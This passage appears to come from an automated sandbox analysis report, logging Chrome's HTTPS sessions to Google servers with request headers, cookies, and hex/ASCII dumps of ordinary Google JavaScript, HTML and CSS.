b==="function"?b():b)==null?void 0:c.concat("\n"))!=null?d:"";throw Error("U`"+b+"`"+String(a));}};_.wba=function(a){

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.16	49731	142.250.186.174	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:26 UTC	1113	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:27 UTC	915	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 126135 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 10:43:14 GMT Expires: Fri, 26 Sep 2025 10:43:14 GMT Cache-Control: public, max-age=31536000 Last-Modified: Fri, 06 Sep 2024 22:07:50 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 18733 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:27 UTC	475	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 62 61 2c 66 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 75 61 2c 77 61 3b 62 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var ba,fa,ha,na,oa,sa,ua,wa;ba=fun
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 Data Ascii: n a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw E
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 62 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 75 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e Data Ascii: efined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:ba(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ua=typeof Object.assign=="function"?Object.
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 3b 74 68 69 73 2e 51 72 3d 5b 5d 3b 74 68 69 73 2e 6a 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 58 64 61 29 2c 72 65 6a 65 63 74 3a 68 28 74 68 69 73 2e 56 4a 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 58 64 61 3d 66 75 6e 63 74 69 Data Ascii: ;this.Qr=[];this.jV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Xda),reject:h(this.VJ)}};e.prototype.Xda=functi
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 51 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 51 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 5a 4f 28 74 68 69 73 2e 51 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 51 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 44 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 6c 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 45 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 2e 63 61 6c 6c 28 6b 2c 6c 2e 72 65 73 6f 6c 76 65 Data Ascii: totype.G7=function(){if(this.Qr!=null){for(var h=0;h<this.Qr.length;++h)f.ZO(this.Qr[h]);this.Qr=null}};var f=new b;e.prototype.Dfa=function(h){var k=this.jF();h.ly(k.resolve,k.reject)};e.prototype.Efa=function(h,k){var l=this.jF();try{h.call(k,l.resolve
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 66 26 26 63 3c 65 3b 29 69 66 28 64 5b 63 2b 2b 5d 21 3d 62 5b 68 2b 2b 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 68 3e 3d 66 7d 7d Data Ascii: egular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));for(var h=0;h<f&&c<e;)if(d[c++]!=b[h++])return!1;return h>=f}}
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 73 61 28 6c 2c 66 29 3f 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3a 76 6f 69 64 20 30 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 Data Ascii: his.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return this};k.prototype.get=function(l){return c(l)&&sa(l,f)?l[f][this.Ga]:void 0};k.prototype.has=function(l){return c(l)&&
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 74 2c 6b 2e 65 66 2e 6e 65 78 74 2e 55 6b 3d 0a 6b 2e 65 66 2e 55 6b 2c 6b 2e 65 66 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 55 6b 3d 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 6b 29 2e 65 66 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 28 6b 3d 64 28 74 68 69 73 2c 6b 29 2e 65 66 29 26 26 6b 2e 76 61 6c 75 65 7d 3b 63 2e 70 72 6f 74 6f 74 79 Data Ascii: t,k.ef.next.Uk=k.ef.Uk,k.ef.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Uk=f();this.size=0};c.prototype.has=function(k){return!!d(this,k).ef};c.prototype.get=function(k){return(k=d(this,k).ef)&&k.value};c.prototy
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 65 74 75 72 6e 21 31 3b 66 3d 65 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 3d 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 2e 78 21 3d 34 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 3f 21 31 3a 65 2e 6e 65 78 74 28 29 2e 64 6f 6e 65 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 76 61 72 20 Data Ascii: ize!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)return!1;f=e.next();return f.done\|\|f.value[0]==c\|\|f.value[0].x!=4\|\|f.value[1]!=f.value[0]?!1:e.next().done}catch(h){return!1}}())return a;var
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 29 3a 28 65 2d 3d 36 35 35 33 36 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 26 31 30 32 33 7c 35 36 33 32 30 29 29 7d 72 65 74 75 72 6e 20 63 7d 7d 29 3b 6e 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 Data Ascii: 4111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(e):(e-=65536,c+=String.fromCharCode(e>>>10&1023\|55296),c+=String.fromCharCode(e&1023\|56320))}return c}});na("Array.prototype.entries",function(a){return

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.16	49729	142.250.184.206	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:26 UTC	1259	OUT	GET /widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&eom=1&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=538&hl=en HTTP/1.1 Host: ogs.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:27 UTC	2143	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Frame-Options: ALLOW-FROM https://www.google.com Content-Security-Policy: frame-ancestors https://www.google.com Content-Security-Policy: script-src 'report-sample' 'nonce-d1q_D20dcyIuwRIST6Q8bA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/OneGoogleWidgetUi/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/OneGoogleWidgetUi/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/OneGoogleWidgetUi/cspreport x-ua-compatible: IE=edge Expires: Thu, 26 Sep 2024 15:55:27 GMT Date: Thu, 26 Sep 2024 15:55:27 GMT Cache-Control: private, max-age=3600 Strict-Transport-Security: max-age=31536000 Cross-Origin-Embedder-Policy-Report-Only: require-corp; report-to="CoepOneGoogleWidgetUi" Report-To: {"group":"CoepOneGoogleWidgetUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/OneGoogleWidgetUi"}]} Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Resource-Policy: same-site Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version reporting-endpoints: default="/_/OneGoogleWidgetUi/web-reports?context=eJzj8tHikmII1JBiKFj5gkni60smNSB2Sp_BGgDErTfPsU4G4qR_51kLgHhJxEXWA4kXWQ0VLrHaA7FqzyVWYyAukrjC2gDEQtwc79uvbWcTOHH7hZiSWlJ-YXx-Xmp6fn56TmpGSUlBcWpRWWpRvJGBkYmBpZGxnoFBfIEBADP0MjI" Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-09-26 15:55:27 UTC	2143	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 67 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 67 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 77 69 64 67 65 74 2f 63 61 6c 6c 6f 75 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 Data Ascii: 8000<!doctype html><html lang="en" dir="ltr"><head><base href="https://ogs.google.com/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><link rel="canonical" href="https://ogs.google.com/widget/callout"><link rel="
2024-09-26 15:55:27 UTC	2143	IN	Data Raw: 65 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 69 66 28 21 63 7c 7c 63 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 3d 22 6e 6f 6e 65 22 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 66 3d 62 2e 64 65 66 61 75 6c 74 56 69 65 77 3b 69 66 28 66 26 26 66 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 26 26 28 66 3d 66 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 63 29 2c 66 2e 68 65 69 67 68 74 3d 3d 22 30 70 78 22 7c 7c 66 2e 77 69 64 74 68 3d 3d 22 30 70 78 22 7c 7c 66 2e 76 69 73 69 62 69 6c 69 74 79 3d 3d 22 68 69 64 64 65 6e 22 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 21 63 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 29 72 65 74 75 72 6e 21 30 3b 0a 76 61 72 20 68 3d 63 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e Data Ascii: e=function(b,c){if(!c\|\|c.style.display=="none")return!1;var f=b.defaultView;if(f&&f.getComputedStyle&&(f=f.getComputedStyle(c),f.height=="0px"\|\|f.width=="0px"\|\|f.visibility=="hidden"))return!1;if(!c.getBoundingClientRect)return!0;var h=c.getBoundingClien
2024-09-26 15:55:27 UTC	2143	IN	Data Raw: 31 7d 2e 4d 43 63 4f 41 63 3e 2e 70 47 78 70 48 63 7b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 30 7d 2e 49 71 42 66 4d 3e 2e 48 4c 6c 41 48 62 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 36 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 31 36 70 78 3b 74 6f 70 3a 30 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 39 7d 2e 56 55 6f 4b 5a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 68 65 69 67 68 74 3a 33 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 31 7d 2e 54 52 48 4c 41 63 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f Data Ascii: 1}.MCcOAc>.pGxpHc{flex-shrink:0;flex-grow:0}.IqBfM>.HLlAHb{align-items:center;display:flex;height:60px;position:absolute;right:16px;top:0;z-index:9999}.VUoKZ{display:none;position:absolute;top:0;left:0;right:0;height:3px;z-index:1001}.TRHLAc{position:abso
2024-09-26 15:55:27 UTC	2143	IN	Data Raw: 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 6e 2d 73 75 72 66 61 63 65 2c 23 65 33 65 33 65 33 29 7d 2e 4e 4b 6d 46 4e 63 2e 76 51 34 33 49 65 20 2e 78 46 49 54 6d 62 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 2e 76 51 34 33 49 65 20 2e 78 46 49 54 6d 62 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 23 63 34 63 37 63 35 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 6e 2d 73 75 72 66 61 63 65 2d 76 61 72 69 61 6e 74 2c 23 63 34 63 37 63 35 29 7d 2e 44 52 63 36 6b 64 2e 79 76 79 59 59 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 30 70 78 7d 2e 68 58 68 68 71 7b 63 6f 6c 6f 72 3a Data Ascii: color:var(--gm3-sys-color-on-surface,#e3e3e3)}.NKmFNc.vQ43Ie .xFITmb:focus-visible,.amE0Md.NKmFNc.vQ43Ie .xFITmb:focus-visible{outline-color:#c4c7c5;outline-color:var(--gm3-sys-color-on-surface-variant,#c4c7c5)}.DRc6kd.yvyYY{padding-top:40px}.hXhhq{color:
